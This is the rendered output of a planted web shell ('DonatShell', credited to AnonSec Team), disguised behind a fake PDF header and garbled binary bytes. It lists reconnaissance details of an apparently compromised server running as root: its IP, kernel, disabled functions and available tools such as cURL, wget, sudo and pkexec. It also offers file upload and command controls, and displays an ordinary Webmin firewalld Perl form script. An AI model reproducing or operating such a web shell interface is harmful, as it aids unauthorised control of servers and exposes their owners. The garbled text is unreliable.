%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/webmin/firewalld/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/webmin/firewalld//zone_form.cgi
#!/usr/bin/perl
# Show a form for creating a new zone, with some default rules

use strict;
use warnings;
no warnings 'redefine';
no warnings 'uninitialized';
require './firewalld-lib.pl';
our (%text, %in);
&ReadParse();
&ui_print_header(undef, $text{'zone_title'}, "");

print &ui_form_start("create_zone.cgi", "post");
print &ui_table_start($text{'zone_header'}, undef, 2);

# New zone name
print &ui_table_row($text{'zone_name'},
	&ui_textbox("name", undef, 20));

# Initial ruleset
print &ui_table_row($text{'zone_mode'},
	&ui_radio_table("mode", 0,
	      [ [ 0, $text{'zone_mode0'} ],
		[ 1, $text{'zone_mode1'},
		  &ui_select("source", $in{'zone'},
			[ map { $_->{'name'} } &list_firewalld_zones() ]) ],
		[ 2, $text{'zone_mode2'} ],
		[ 3, $text{'zone_mode3'} ],
		[ 4, $text{'zone_mode4'} ] ]));

print &ui_table_end();
print &ui_form_end([ [ undef, $text{'create'} ] ]);

&ui_print_footer("index.cgi?zone=".&urlize($in{'zone'}),
		 $text{'index_return'});

Anon7 - 2022
AnonSec Team